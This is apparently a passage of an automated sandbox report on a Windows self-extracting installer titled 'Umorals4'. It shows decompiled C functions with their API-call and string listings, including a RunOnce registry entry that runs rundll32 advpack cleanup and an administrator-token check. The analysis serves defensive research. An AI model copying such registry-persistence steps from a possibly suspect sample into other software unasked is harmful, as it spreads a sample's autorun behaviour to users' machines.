                  					if(_t34 == 0x53) {
                  						L14:
                  						GetSystemDirectoryA(_t61, _t63);
                  						goto L15;
                  					} else {
                  						if(_t34 == 0x57) {
                  							GetWindowsDirectoryA(_t61, 0x104);
                  							goto L16;
                  						} else {
                  							_push(_t52);
                  							_v288 = 0x104;
                  							E00F3158C( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                  							_t59 = 0x104;
                  							E00F364E7( &_v268, 0x104, _v276);
                  							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                  								L16:
                  								_t59 = _t63;
                  								E00F364E7(_t61, _t63, _v276);
                  							} else {
                  								if(RegQueryValueExA(_v284, 0xf31111, 0,  &_v280, _t61,  &_v288) == 0) {
                  									_t45 = _v280;
                  									if(_t45 != 2) {
                  										L9:
                  										if(_t45 == 1) {
                  											goto L10;
                  										}
                  									} else {
                  										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                  											_t45 = _v280;
                  											goto L9;
                  										} else {
                  											_t59 = 0x104;
                  											E00F31485(_t61, 0x104,  &_v268);
                  											L10:
                  											_t50 = 1;
                  										}
                  									}
                  								}
                  								RegCloseKey(_v284);
                  								L15:
                  								if(_t50 == 0) {
                  									goto L16;
                  								}
                  							}
                  						}
                  					}
                  				}
                  				return E00F36C20(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                  			}

                  APIs
                  • CharUpperA.USER32(FDACA2C3,00000000,00000000,00000000), ref: 00F32610
                  • CharNextA.USER32(00000001), ref: 00F3261D
                  • CharNextA.USER32(00000000), ref: 00F32624
                  • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32691
                  • RegQueryValueExA.ADVAPI32(?,00F31111,00000000,?,00000000,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F326BA
                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F326D8
                  • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32708
                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00F32712
                  • GetSystemDirectoryA.KERNEL32 ref: 00F32721
                  Strings
                  • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00F3264C
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                  • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                  • API String ID: 2659952014-2428544900
                  • Opcode ID: d7d55a114caa406f8f2fc8d35203c15332989455b98a80bd6945a15973e0e24b
                  • Instruction ID: e4d718d097d9f68873f4c593fc22d73714d06cb135f52ba32aea2b361d748bd1
                  • Opcode Fuzzy Hash: d7d55a114caa406f8f2fc8d35203c15332989455b98a80bd6945a15973e0e24b
                  • Instruction Fuzzy Hash: 0941A3B1E0012CAFDB649B65DC89AEABBBDFF55730F004095F585D2110DB708E85EB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 64%
                  			E00F320AF() {
                  				signed int _v8;
                  				void _v267;
                  				char _v268;
                  				char _v836;
                  				void* _v840;
                  				int _v844;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t20;
                  				intOrPtr _t34;
                  				void* _t39;
                  				intOrPtr* _t43;
                  				void* _t46;
                  				void* _t48;
                  				void* _t50;
                  				signed int _t52;
                  
                  				_t20 =  *0xf38000; // 0xfdaca2c3
                  				_t21 = _t20 ^ _t52;
                  				_v8 = _t20 ^ _t52;
                  				if( *0xf38570 != 0) {
                  					_push(_t39);
                  					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                  						_push(_t48);
                  						_v844 = 0x238;
                  						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                  							_push(_t50);
                  							_v268 = 0;
                  							memset( &_v267, 0, 0x103);
                  							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                  								E00F364E7( &_v268, 0x104, 0xf31111);
                  							}
                  							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                  							E00F31524( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                  							_t43 =  &_v836;
                  							_t46 = _t43 + 1;
                  							_pop(_t50);
                  							do {
                  								_t34 =  *_t43;
                  								_t43 = _t43 + 1;
                  							} while (_t34 != 0);
                  							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t43 - _t46 + 1);
                  						}
                  						_t21 = RegCloseKey(_v840);
                  						_pop(_t48);
                  					}
                  					_pop(_t39);
                  				}
                  				return E00F36C20(_t21, _t39, _v8 ^ _t52, _t46, _t48, _t50);
                  			}

                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00F320EB
                  • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,?), ref: 00F32120
                  • memset.MSVCRT ref: 00F32142
                  • GetSystemDirectoryA.KERNEL32 ref: 00F32157
                  • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,00000001), ref: 00F321C0
                  • RegCloseKey.ADVAPI32(?), ref: 00F321CC
                  Strings
                  • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00F3217F
                  • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00F32173
                  • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00F320E1
                  • wextract_cleanup0, xrefs: 00F320C4, 00F32115, 00F321B5
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                  • API String ID: 3027380567-2554356261
                  • Opcode ID: 11760d8832c4ee9a9e2728865d7754c1ba7b7b0d32923b9489802d72de75ed59
                  • Instruction ID: eba5186cf2ab9872c47ec71da2b4a3d4ee82f16b6b3bf76ee67bc512b9b87a14
                  • Opcode Fuzzy Hash: 11760d8832c4ee9a9e2728865d7754c1ba7b7b0d32923b9489802d72de75ed59
                  • Instruction Fuzzy Hash: A131E8B1E0021CABDB65DB21DC45FEA777CEB44374F0000E5B54DE6141DA749F85EA61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 87%
                  			E00F32FA0(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                  				void* _t8;
                  				void* _t11;
                  				void* _t15;
                  				struct HWND__* _t16;
                  				struct HWND__* _t33;
                  				struct HWND__* _t34;
                  
                  				_t8 = _a8 - 0xf;
                  				if(_t8 == 0) {
                  					if( *0xf385c4 == 0) {
                  						 *0xf385d4 = SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                  						 *0xf385c4 = 1;
                  					}
                  					L13:
                  					return 0;
                  				}
                  				_t11 = _t8 - 1;
                  				if(_t11 == 0) {
                  					L7:
                  					_push(0);
                  					L8:
                  					EndDialog(_a4, ??);
                  					L9:
                  					return 1;
                  				}
                  				_t15 = _t11 - 0x100;
                  				if(_t15 == 0) {
                  					_t16 = GetDesktopWindow();
                  					_t33 = _a4;
                  					E00F34239(_t33, _t16);
                  					SetDlgItemTextA(_t33, 0x834,  *0xf39044);
                  					SetWindowTextA(_t33, "Umorals4");
                  					SetForegroundWindow(_t33);
                  					_t34 = GetDlgItem(_t33, 0x834);
                  					 *0xf39040 = GetWindowLongA(_t34, 0xfffffffc);
                  					SetWindowLongA(_t34, 0xfffffffc, E00F32F60);
                  					return 1;
                  				}
                  				if(_t15 != 1) {
                  					goto L13;
                  				}
                  				if(_a12 != 6) {
                  					if(_a12 != 7) {
                  						goto L9;
                  					}
                  					goto L7;
                  				}
                  				_push(1);
                  				goto L8;
                  			}

                  APIs
                  • EndDialog.USER32(?,00000000), ref: 00F32FD7
                  • GetDesktopWindow.USER32 ref: 00F32FE7
                  • SetDlgItemTextA.USER32 ref: 00F33006
                  • SetWindowTextA.USER32(?,Umorals4), ref: 00F33012
                  • SetForegroundWindow.USER32(?), ref: 00F33019
                  • GetDlgItem.USER32 ref: 00F33021
                  • GetWindowLongA.USER32 ref: 00F3302C
                  • SetWindowLongA.USER32(00000000,000000FC,00F32F60), ref: 00F3303F
                  • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00F33066
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                  • String ID: Umorals4
                  • API String ID: 3785188418-264535404
                  • Opcode ID: 6fb91c2e5a435e1adb718fff5972dc23eb88f422f3eeaaeb649e962332b9c9ef
                  • Instruction ID: 11ff30e61eb57cdf7d1901360ece9162631f5c2cb93f739f0cfc93bd894240e8
                  • Opcode Fuzzy Hash: 6fb91c2e5a435e1adb718fff5972dc23eb88f422f3eeaaeb649e962332b9c9ef
                  • Instruction Fuzzy Hash: 0A21A231608218ABCB51AF35EC0CF6A3AB5FB49735F104114F851A11E0CBB89641FB92
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E00F316B6(void* __edx, void* __esi) {
                  				signed int _v8;
                  				short _v12;
                  				struct _SID_IDENTIFIER_AUTHORITY _v16;
                  				char _v20;
                  				void* _v24;
                  				long _v28;
                  				void* _v32;
                  				void* __ebx;
                  				void* __edi;
                  				signed int _t23;
                  				long _t45;
                  				void* _t49;
                  				int _t50;
                  				void* _t52;
                  				signed int _t53;
                  
                  				_t51 = __esi;
                  				_t49 = __edx;
                  				_t23 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t23 ^ _t53;
                  				_t25 =  *0xf38108; // 0x2
                  				_t45 = 0;
                  				_v12 = 0x500;
                  				_t50 = 2;
                  				_v16.Value = 0;
                  				_v20 = 0;
                  				if(_t25 != _t50) {
                  					L20:
                  					return E00F36C20(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                  				}
                  				if(E00F315FC( &_v20) != 0) {
                  					_t25 = _v20;
                  					if(_v20 != 0) {
                  						 *0xf38108 = 1;
                  					}
                  					goto L20;
                  				}
                  				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v24) == 0) {
                  					goto L20;
                  				}
                  				if(GetTokenInformation(_v24, _t50, 0, 0,  &_v28) != 0 || GetLastError() != 0x7a) {
                  					L17:
                  					CloseHandle(_v24);
                  					_t25 = _v20;
                  					goto L20;
                  				} else {
                  					_push(__esi);
                  					_t52 = LocalAlloc(0, _v28);
                  					if(_t52 == 0) {
                  						L16:
                  						_pop(_t51);
                  						goto L17;
                  					}
                  					if(GetTokenInformation(_v24, _t50, _t52, _v28,  &_v28) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                  						L15:
                  						LocalFree(_t52);
                  						goto L16;
                  					} else {
                  						if( *_t52 <= 0) {
                  							L14:
                  							FreeSid(_v32);
                  							goto L15;
                  						}
                  						_t15 = _t52 + 4; // 0x4
                  						_t50 = _t15;
                  						while(EqualSid( *_t50, _v32) == 0) {
                  							_t45 = _t45 + 1;
                  							_t50 = _t50 + 8;
                  							if(_t45 <  *_t52) {
                  								continue;
                  							}
                  							goto L14;
                  						}
                  						 *0xf38108 = 1;
                  						_v20 = 1;
                  						goto L14;
                  					}
                  				}
                  			}



















                  APIs
                    • Part of subcall function 00F315FC: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00F316F0), ref: 00F31628
                    • Part of subcall function 00F315FC: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00F3163A
                    • Part of subcall function 00F315FC: AllocateAndInitializeSid.ADVAPI32(00F316F0,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F316F0), ref: 00F31663
                    • Part of subcall function 00F315FC: FreeSid.ADVAPI32(?,?,?,?,00F316F0), ref: 00F31691
                    • Part of subcall function 00F315FC: FreeLibrary.KERNEL32(00000000,?,?,?,00F316F0), ref: 00F31698
                  • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00F316FE
                  • OpenProcessToken.ADVAPI32(00000000), ref: 00F31705
                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00F3171D
                  • GetLastError.KERNEL32 ref: 00F3172B
                  • LocalAlloc.KERNEL32(00000000,?,?), ref: 00F3173F
                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00F31757
                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F31777
                  • EqualSid.ADVAPI32(00000004,?), ref: 00F3178D
                  • FreeSid.ADVAPI32(?), ref: 00F317AF
                  • LocalFree.KERNEL32(00000000), ref: 00F317B6
                  • CloseHandle.KERNEL32(?), ref: 00F317C0
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                  • String ID:
                  • API String ID: 2168512254-0
                  • Opcode ID: b632dd593c56ed6a73088c2e40744d59acd36cb1a66892d64cc2fbb357148ecf
                  • Instruction ID: 8a487a350c746027881fb2fb0da6624483195bd3037618d3acbd27eb73c0b194
                  • Opcode Fuzzy Hash: b632dd593c56ed6a73088c2e40744d59acd36cb1a66892d64cc2fbb357148ecf
                  • Instruction Fuzzy Hash: F9314CB5E0020DAFDB209FA6DC88AAFBBB9FB04371F144129F945D2150DB349901EB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00F34538(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                  				void* __ebx;
                  				long _t4;
                  				void* _t12;
                  				CHAR* _t15;
                  				void* _t16;
                  				long _t17;
                  
                  				_t15 = __ecx;
                  				_t12 = __edx;
                  				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                  				_t17 = _t4;
                  				if(_t17 <= _a4 && _t12 != 0) {
                  					if(_t17 != 0) {
                  						_t16 = LockResource(LoadResource(0, FindResourceA(0, _t15, 0xa)));
                  						if(_t16 == 0) {
                  							goto L3;
                  						}
                  						E00F36F15(_t12, _t12, _a4, _t16, _t17);
                  						FreeResource(_t16);
                  						return _t17;
                  					}
                  					L3:
                  					return 0;
                  				}
                  				return _t4;
                  			}










                  APIs
                  • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34549
                  • SizeofResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34552
                  • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34570
                  • LoadResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34579
                  • LockResource.KERNEL32(00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34580
                  • FreeResource.KERNEL32(00000000,?,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F3459B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Resource$Find$FreeLoadLockSizeof
                  • String ID: TITLE$Umorals4
                  • API String ID: 468261009-4215533847
                  • Opcode ID: fbd1476621a6d9143462483ccc87ce8e546a13633123cd2a0096a1f3d483e6a0
                  • Instruction ID: d0097659ff6dfbb133eb263d943598814cd4338c6c496cfa243048687abedf6f
                  • Opcode Fuzzy Hash: fbd1476621a6d9143462483ccc87ce8e546a13633123cd2a0096a1f3d483e6a0
                  • Instruction Fuzzy Hash: 9A01A473A002547BE7612BA6AC4DF3B3A6DDBD5BB2F084014FE49C6180CA64AC10B672
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00F332E0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                  				void* _t7;
                  				void* _t11;
                  				struct HWND__* _t12;
                  				int _t22;
                  				struct HWND__* _t24;
                  
                  				_t7 = _a8 - 0x10;
                  				if(_t7 == 0) {
                  					EndDialog(_a4, 2);
                  					L11:
                  					return 1;
                  				}
                  				_t11 = _t7 - 0x100;
                  				if(_t11 == 0) {
                  					_t12 = GetDesktopWindow();
                  					_t24 = _a4;
                  					E00F34239(_t24, _t12);
                  					SetWindowTextA(_t24, "Umorals4");
                  					SetDlgItemTextA(_t24, 0x838,  *0xf39444);
                  					SetForegroundWindow(_t24);
                  					goto L11;
                  				}
                  				if(_t11 == 1) {
                  					_t22 = _a12;
                  					if(_t22 < 6) {
                  						goto L11;
                  					}
                  					if(_t22 <= 7) {
                  						L8:
                  						EndDialog(_a4, _t22);
                  						return 1;
                  					}
                  					if(_t22 != 0x839) {
                  						goto L11;
                  					}
                  					 *0xf3921c = 1;
                  					goto L8;
                  				}
                  				return 0;
                  			}









                  APIs
                  • EndDialog.USER32(?,?), ref: 00F3331E
                  • GetDesktopWindow.USER32 ref: 00F33328
                  • SetWindowTextA.USER32(?,Umorals4), ref: 00F33340
                  • SetDlgItemTextA.USER32 ref: 00F33352
                  • SetForegroundWindow.USER32(?), ref: 00F33359
                  • EndDialog.USER32(?,00000002), ref: 00F33366
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Window$DialogText$DesktopForegroundItem
                  • String ID: Umorals4
                  • API String ID: 852535152-264535404
                  • Opcode ID: 44c6d5bd33f2a3f40563b52a57b3dc644059dbb116585353b04444147a2a5ea4
                  • Instruction ID: cd1fc1019b9c844c2067131322feeb79a58538e87ae2cfe59a4220963a74ee57
                  • Opcode Fuzzy Hash: 44c6d5bd33f2a3f40563b52a57b3dc644059dbb116585353b04444147a2a5ea4
                  • Instruction Fuzzy Hash: 43017132A44128AFDB15AF69DC4D96E3A56FB49731F00C010F986D61A0CFB4DA01FBD1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00F32755(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                  				void* _v8;
                  				char* _v12;
                  				intOrPtr _v16;
                  				void* _v20;
                  				intOrPtr _v24;
                  				int _v28;
                  				int _v32;
                  				void* _v36;
                  				int _v40;
                  				void* _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				long _t69;
                  				void* _t71;
                  				void* _t74;
                  				void* _t80;
                  				void* _t87;
                  				void* _t88;
                  				intOrPtr _t93;
                  				intOrPtr _t97;
                  				intOrPtr _t99;
                  				int _t100;
                  				void* _t102;
                  				void* _t105;
                  				void* _t108;
                  				void* _t109;
                  
                  				_v12 = __edx;
                  				_t99 = __ecx;
                  				_t105 = 0;
                  				_v16 = __ecx;
                  				_t87 = 0;
                  				_t102 = 0;
                  				_v20 = 0;
                  				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                  					L19:
                  					_t105 = 1;
                  				} else {
                  					_t62 = 0;
                  					_v8 = 0;
                  					while(1) {
                  						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                  						if(E00F325DB(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + 0x84 + _t99) == 0) {
                  							goto L20;
                  						}
                  						_t69 = GetFileVersionInfoSizeA(_v12,  &_v32);
                  						_v28 = _t69;
                  						if(_t69 == 0) {
                  							_t99 = _v16;
                  							_t71 = _v8 + _t99;
                  							_t93 = _v24;
                  							_t87 = _v20;
                  							if( *((intOrPtr*)(_t71 + _t93 + 0x84)) == _t105 &&  *((intOrPtr*)(_t71 + _t93 + 0x88)) == _t105) {
                  								goto L18;
                  							}
                  						} else {
                  							_t102 = GlobalAlloc(0x42, _t69);
                  							if(_t102 != 0) {
                  								_t74 = GlobalLock(_t102);
                  								_v36 = _t74;
                  								if(_t74 != 0) {
                  									if(GetFileVersionInfoA(_v12, _v32, _v28, _t74) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                  										L15:
                  										GlobalUnlock(_t102);
                  										_t99 = _v16;
                  										L18:
                  										_t87 = _t87 + 1;
                  										_t62 = _v8 + 0x3c;
                  										_v20 = _t87;
                  										_v8 = _v8 + 0x3c;
                  										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                  											continue;
                  										} else {
                  											goto L19;
                  										}
                  									} else {
                  										_t80 = _v44;
                  										_t88 = _t105;
                  										_v28 =  *((intOrPtr*)(_t80 + 0xc));
                  										_t100 = _v28;
                  										_v48 =  *((intOrPtr*)(_t80 + 8));
                  										_t84 = _v8 + _v16 + _v24 + 0x94;
                  										_t97 = _v48;
                  										_v36 = _t84;
                  										_t108 = _t84;
                  										do {
                  											 *((intOrPtr*)(_t109 + _t88 - 0x34)) = E00F328FA(_t84, _t97, _t100,  *((intOrPtr*)(_t108 - 0x10)),  *((intOrPtr*)(_t108 - 0xc)));
                  											 *((intOrPtr*)(_t109 + _t88 - 0x3c)) = E00F328FA(_t85, _t97, _t100,  *((intOrPtr*)(_t108 - 4)),  *_t108);
                  											_t108 = _t108 + 0x18;
                  											_t88 = _t88 + 4;
                  										} while (_t88 < 8);
                  										_t87 = _v20;
                  										_t105 = 0;
                  										if(_v56 < 0 || _v64 > 0) {
                  											if(_v52 < _t105 || _v60 > _t105) {
                  												GlobalUnlock(_t102);
                  											} else {
                  												goto L15;
                  											}
                  										} else {
                  											goto L15;
                  										}
                  									}
                  								}
                  							}
                  						}
                  						goto L20;
                  					}
                  				}
                  				L20:
                  				 *_a8 = _t87;
                  				if(_t102 != 0) {
                  					GlobalFree(_t102);
                  				}
                  				return _t105;
                  			}

































                  APIs
                  • GlobalFree.KERNEL32 ref: 00F328DB
                    • Part of subcall function 00F325DB: CharUpperA.USER32(FDACA2C3,00000000,00000000,00000000), ref: 00F32610
                    • Part of subcall function 00F325DB: CharNextA.USER32(00000001), ref: 00F3261D
                    • Part of subcall function 00F325DB: CharNextA.USER32(00000000), ref: 00F32624
                    • Part of subcall function 00F325DB: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32691
                    • Part of subcall function 00F325DB: RegQueryValueExA.ADVAPI32(?,00F31111,00000000,?,00000000,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F326BA
                    • Part of subcall function 00F325DB: ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F326D8
                    • Part of subcall function 00F325DB: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32708
                  • GetFileVersionInfoSizeA.VERSION(00000000,00F3379F,?,00000001,00000000,-00000004,?,?,?,?,?,?,?,?,00F3379F,?), ref: 00F327B0
                  • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00F3379F,?,?,?,?,00000000), ref: 00F327C4
                  • GlobalLock.KERNEL32 ref: 00F327D5
                  • GetFileVersionInfoA.VERSION(00000000,00F3379F,?,00000000,?,?,?,?,?,?,?,?,00F3379F,?,?,?), ref: 00F327F0
                  • VerQueryValueA.VERSION(?,00F31214,?,?,?,?,?,?,?,?,?,?,00F3379F,?,?,?), ref: 00F3280E
                  • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F3379F,?,?,?,?,00000000,?), ref: 00F3288D
                  • GlobalUnlock.KERNEL32(00000000,FFFFFFFE,?,?,?), ref: 00F328ED
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                  • String ID:
                  • API String ID: 1051330783-0
                  • Opcode ID: dc9cd82e7f209d1cf0a036c33a861427c31f1793ef77e4e3fb91d387aa79e825
                  • Instruction ID: 504b910c73375320b20c35ca8d7ff20d0e1a04d5e4567d9c54576c04411861e1
                  • Opcode Fuzzy Hash: dc9cd82e7f209d1cf0a036c33a861427c31f1793ef77e4e3fb91d387aa79e825
                  • Instruction Fuzzy Hash: BD515871E00219EFCB55CF99DC84AAEFBB5FF48720F14406AE905E3221CB319945EBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E00F32922(CHAR* __ecx, char* __edx) {
                  				signed int _v8;
                  				char _v268;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t15;
                  				int _t20;
                  				char _t31;
                  				intOrPtr _t33;
                  				char* _t37;
                  				char _t41;
                  				char* _t43;
                  				CHAR* _t50;
                  				intOrPtr* _t53;
                  				CHAR* _t57;
                  				void* _t60;
                  				CHAR* _t62;
                  				CHAR* _t63;
                  				signed int _t64;
                  
                  				_t58 = __edx;
                  				_t15 =  *0xf38000; // 0xfdaca2c3
                  				_t16 = _t15 ^ _t64;
                  				_v8 = _t15 ^ _t64;
                  				_t43 = __edx;
                  				_t63 = __ecx;
                  				 *__edx = 0;
                  				_t62 = __edx;
                  				if(__ecx != 0 &&  *((char*)(__ecx)) != 0) {
                  					GetModuleFileNameA( *0xf39164,  &_v268, 0x104);
                  					while(1) {
                  						_t16 =  *_t63;
                  						if(_t16 == 0) {
                  							break;
                  						}
                  						_t20 = IsDBCSLeadByte(_t16);
                  						 *_t62 =  *_t63;
                  						if(_t20 != 0) {
                  							_t62[1] = _t63[1];
                  						}
                  						if( *_t63 != 0x23) {
                  							L20:
                  							_t62 = CharNextA(_t62);
                  						} else {
                  							_t63 = CharNextA(_t63);
                  							if(CharUpperA( *_t63) != 0x44) {
                  								if(CharUpperA( *_t63) != 0x45) {
                  									if( *_t63 == 0x23) {
                  										goto L20;
                  									}
                  								} else {
                  									E00F31485(_t62, E00F315D1(_t43, _t62),  &_v268);
                  									_t50 = _t62;
                  									_t13 =  &(_t50[1]); // 0x1
                  									_t58 = _t13;
                  									do {
                  										_t31 =  *_t50;
                  										_t50 =  &(_t50[1]);
                  									} while (_t31 != 0);
                  									goto L18;
                  								}
                  							} else {
                  								E00F3654A( &_v268);
                  								_t53 =  &_v268;
                  								_t60 = _t53 + 1;
                  								do {
                  									_t33 =  *_t53;
                  									_t53 = _t53 + 1;
                  								} while (_t33 != 0);
                  								_t37 = CharPrevA( &_v268,  &(( &_v268)[_t53 - _t60]));
                  								if(_t37 != 0 &&  *_t37 == 0x5c) {
                  									 *_t37 = 0;
                  								}
                  								E00F31485(_t62, E00F315D1(_t43, _t62),  &_v268);
                  								_t57 = _t62;
                  								_t11 =  &(_t57[1]); // 0x1
                  								_t58 = _t11;
                  								do {
                  									_t41 =  *_t57;
